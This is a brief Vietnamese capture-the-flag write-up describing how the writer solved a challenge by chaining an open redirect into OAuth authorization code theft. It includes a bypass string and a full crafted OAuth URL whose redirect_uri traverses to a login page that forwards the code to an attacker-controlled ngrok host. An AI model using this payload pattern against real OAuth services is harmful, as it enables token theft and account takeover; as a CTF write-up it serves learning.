Mình viết sơ qua các steps mình làm
- Tác giả hint là open-redirect
- Mình có coi qua rồi, khi nhấn vào report chưa login nó sẽ chuyển sang page login, có params return=report.php
- search Open Redirect Fuzz List
- Thử vài cái thấy
\/google.com
ok - làm cái đường link để report
http://sadpen.ctf.yeuchimse.com/oauth.php?client_id=42&type=code&redirect_uri=http%3A%2F%2Fsadbook.ctf.yeuchimse.com%2Foauth%2Fcallback.php%2F..%2F..%2Flogin.php%3Futm_client%3D113.180.103.214%26return%3D%5C%2Fc4264db7.ngrok.io
- report cho tác giả
- lấy đc
code
- vào đọc tâm sự